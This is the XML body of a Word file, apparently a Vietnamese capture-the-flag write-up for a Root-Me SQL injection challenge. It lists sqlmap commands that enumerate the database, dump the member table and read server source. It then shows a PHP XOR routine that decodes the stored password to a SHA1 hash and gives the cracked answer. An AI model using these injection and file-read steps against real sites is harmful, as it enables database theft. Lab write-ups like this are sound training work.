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5F175" w14:textId="2962B013" w:rsidR="00EA3A91" w:rsidRDefault="00EA3A91" w:rsidP="00170F1C">
      <w:r>
        <w:t xml:space="preserve">Ta thấy trang không filter đầu </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>vào</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4270D455" w14:textId="525E7CDE" w:rsidR="00EA3A91" w:rsidRDefault="00EA3A91" w:rsidP="00170F1C">
      <w:r>
        <w:t>Đầu tiên ta sẽ thực hiện các lệnh thăm dò</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE942D8" w14:textId="28995C69" w:rsidR="00E5161F" w:rsidRDefault="00E5161F" w:rsidP="00170F1C">
      <w:r>
        <w:t>Thăm dò db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6AB0B0" w14:textId="02EED455" w:rsidR="00A55151" w:rsidRDefault="00A55151" w:rsidP="00170F1C">
      <w:r w:rsidRPr="00A55151">
        <w:t>py sqlmap.py -u "http://challenge01.root-me.org/web-serveur/ch31/?action=members&amp;id=1" --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7335E125" w14:textId="1E7AF878" w:rsidR="00C54FA4" w:rsidRDefault="00A55151" w:rsidP="00170F1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DD638C8" wp14:editId="1D6F4C29">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="198836837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68378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E2A4" w14:textId="6A12D31C" w:rsidR="00E5161F" w:rsidRDefault="00E5161F" w:rsidP="00170F1C">
      <w:r>
        <w:t xml:space="preserve">Thăm dò table </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0665FD88" w14:textId="7609B3D2" w:rsidR="00A55151" w:rsidRDefault="00A55151" w:rsidP="00170F1C">
      <w:r w:rsidRPr="00A55151">
        <w:t>sqlmap -u "http://challenge01.root-me.org/web-serveur/ch31/?action=members&amp;id=1" --tables -D c_webserveur_31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F099CE" w14:textId="49CA6DCA" w:rsidR="00A55151" w:rsidRDefault="00A55151" w:rsidP="00170F1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59E50A91" wp14:editId="6F0A8BC8">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="175531853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18538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C6E8" w14:textId="51668AB5" w:rsidR="00A55151" w:rsidRDefault="00E5161F" w:rsidP="00170F1C">
      <w:r>
        <w:t>Thăm dò cột</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AF4A0F" w14:textId="33B14A79" w:rsidR="00A55151" w:rsidRDefault="00A55151" w:rsidP="00170F1C">
      <w:r w:rsidRPr="00A55151">
        <w:t>py sqlmap.py -u "http://challenge01.root-me.org/web-serveur/ch31/?action=members&amp;id=1" --columns -D c_webserveur_31 -T member</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44495959" w14:textId="65E414B3" w:rsidR="00A55151" w:rsidRDefault="00A55151" w:rsidP="00170F1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DB5BF25" wp14:editId="4B8F324E">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="55279861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98613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F3C9" w14:textId="644712DC" w:rsidR="00E5161F" w:rsidRDefault="00E5161F" w:rsidP="00170F1C">
      <w:r>
        <w:t>Thực hiện dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3692CE" w14:textId="6092411C" w:rsidR="00A55151" w:rsidRDefault="00A55151" w:rsidP="00170F1C">
      <w:r w:rsidRPr="00A55151">
        <w:lastRenderedPageBreak/>
        <w:t>py sqlmap.py -u "http://challenge01.root-me.org/web-serveur/ch31/?action=members&amp;id=1" --dump -D c_webserveur_31 -T member</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541DBBBF" w14:textId="739708A7" w:rsidR="00A55151" w:rsidRDefault="00A55151" w:rsidP="00170F1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CCBC564" wp14:editId="4BDD293A">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="108738609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86099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E7FB" w14:textId="1350208C" w:rsidR="00A55151" w:rsidRDefault="00890507" w:rsidP="00170F1C">
      <w:r>
        <w:t xml:space="preserve">Mempass: </w:t>
      </w:r>
      <w:r w:rsidR="00A55151" w:rsidRPr="00A55151">
        <w:t>VA5QA1cCVQgPXwEAXwZVVVsHBgtfUVBaV1QEAwIFVAJWAwBRC1tRVA==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FD6724" w14:textId="678DDF37" w:rsidR="00E61CB5" w:rsidRDefault="00E61CB5" w:rsidP="00170F1C">
      <w:r>
        <w:t>Tìm code và key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D94B1B5" w14:textId="2D448866" w:rsidR="001B6024" w:rsidRDefault="002A58BF" w:rsidP="00170F1C">
      <w:r w:rsidRPr="002A58BF">
        <w:t>python sqlmap.py -u "http://challenge01.root-me.org/web-serveur/ch31/?action=members&amp;id=1" —-file-read=/challenge/web-serveur/ch31/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5867BCC7" w14:textId="6D1EE08A" w:rsidR="002A58BF" w:rsidRDefault="002A58BF" w:rsidP="00170F1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5498EE0A" wp14:editId="7B7035F6">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="23912142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21426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D4F9" w14:textId="5D7EF2E1" w:rsidR="00A55151" w:rsidRDefault="00A55151" w:rsidP="00170F1C">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00890507">
        <w:t xml:space="preserve">Key: </w:t>
      </w:r>
      <w:r w:rsidR="00890507" w:rsidRPr="00890507">
        <w:t>c92fcd618967933ac463feb85ba00d5a7ae52842</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77887A58" w14:textId="6D95C7DD" w:rsidR="00A55151" w:rsidRDefault="005E45B8" w:rsidP="00170F1C">
      <w:r>
        <w:t>Viết code php để giải password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A89F091" w14:textId="77777777" w:rsidR="00890507" w:rsidRDefault="00890507" w:rsidP="00890507">
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DEBAA1" w14:textId="77777777" w:rsidR="00890507" w:rsidRDefault="00890507" w:rsidP="00890507">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>stringxor(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>$o1, $o2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AA5EB2" w14:textId="77777777" w:rsidR="00890507" w:rsidRDefault="00890507" w:rsidP="00890507">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$res = '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>';</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="19FFB2F3" w14:textId="77777777" w:rsidR="00890507" w:rsidRDefault="00890507" w:rsidP="00890507">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>for($i=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>0;$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>i&lt;strlen($o1);$i++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0180D76B" w14:textId="77777777" w:rsidR="00890507" w:rsidRDefault="00890507" w:rsidP="00890507">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>res .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">= chr(ord($o1[$i]) ^ ord($o2[$i]));        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D4CDC2" w14:textId="77777777" w:rsidR="00890507" w:rsidRDefault="00890507" w:rsidP="00890507">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>res;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6CE6538E" w14:textId="77777777" w:rsidR="00890507" w:rsidRDefault="00890507" w:rsidP="00890507">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B207036" w14:textId="77777777" w:rsidR="00890507" w:rsidRDefault="00890507" w:rsidP="00890507">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067DAAC0" w14:textId="77777777" w:rsidR="00890507" w:rsidRDefault="00890507" w:rsidP="00890507">
      <w:r>
        <w:t>$key = "c92fcd618967933ac463feb85ba00d5a7ae52842</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1E0C4724" w14:textId="77777777" w:rsidR="00890507" w:rsidRDefault="00890507" w:rsidP="00890507">
      <w:r>
        <w:t xml:space="preserve">echo "sha1 of password is: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>".stringxor</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>($key,base64_decode('VA5QA1cCVQgPXwEAXwZVVVsHBgtfUVBaV1QEAwIFVAJWAwBRC1tRVA=='));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D90170" w14:textId="452AA407" w:rsidR="00890507" w:rsidRDefault="00890507" w:rsidP="00890507">
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE383FA" w14:textId="262166CB" w:rsidR="00890507" w:rsidRDefault="00890507" w:rsidP="00890507">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="685E46CC" wp14:editId="7B1A99BF">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="508039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391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36CF" w14:textId="712596F8" w:rsidR="005E45B8" w:rsidRDefault="005E45B8" w:rsidP="00890507">
      <w:r>
        <w:t>Có được hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18713981" w14:textId="4A1DAEF7" w:rsidR="00890507" w:rsidRDefault="00890507" w:rsidP="00890507">
      <w:r>
        <w:t xml:space="preserve">Sha1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00890507">
        <w:t>77be4fc97f77f5f48308942bb6e32aacabed9cef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCE11C5" w14:textId="1666A075" w:rsidR="005E45B8" w:rsidRDefault="005E45B8" w:rsidP="00890507">
      <w:r>
        <w:t>Tìm hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194FD6FE" w14:textId="5C4F6550" w:rsidR="00936242" w:rsidRDefault="00936242" w:rsidP="00890507">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="594325A2" wp14:editId="35CEDF0A">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="968369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697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2964" w14:textId="7A265695" w:rsidR="00936242" w:rsidRPr="00170F1C" w:rsidRDefault="00936242" w:rsidP="00890507">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>superpassword</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00936242" w:rsidRPr="00170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31AF8" w14:textId="77777777" w:rsidR="0083140E" w:rsidRDefault="0083140E" w:rsidP="009C7AC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1A432363" w14:textId="77777777" w:rsidR="0083140E" w:rsidRDefault="0083140E" w:rsidP="009C7A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96DB6" w14:textId="77777777" w:rsidR="0083140E" w:rsidRDefault="0083140E" w:rsidP="009C7AC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5BFAF5C5" w14:textId="77777777" w:rsidR="0083140E" w:rsidRDefault="0083140E" w:rsidP="009C7A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CD7"/>
    <w:rsid w:val="000A4CD7"/>
    <w:rsid w:val="000B231B"/>
    <w:rsid w:val="00170F1C"/>
    <w:rsid w:val="001B6024"/>
    <w:rsid w:val="001C6B7B"/>
    <w:rsid w:val="002A58BF"/>
    <w:rsid w:val="003C600B"/>
    <w:rsid w:val="005B7BC5"/>
    <w:rsid w:val="005E45B8"/>
    <w:rsid w:val="0083140E"/>
    <w:rsid w:val="00890507"/>
    <w:rsid w:val="00936242"/>
    <w:rsid w:val="009C7AC2"/>
    <w:rsid w:val="00A55151"/>
    <w:rsid w:val="00C54FA4"/>
    <w:rsid w:val="00CC6180"/>
    <w:rsid w:val="00E5161F"/>
    <w:rsid w:val="00E61CB5"/>
    <w:rsid w:val="00EA3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11A71"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8B7320B2-58CE-4881-BBDA-175789C87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7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AC2"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009C7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A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0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77986">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="120"/>
          <w:marBottom w:val="360"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            <w:left w:val="single" w:sz="36" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            <w:right w:val="single" w:sz="6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cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Võ Anh Kiệt</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-11T03:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-14T09:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>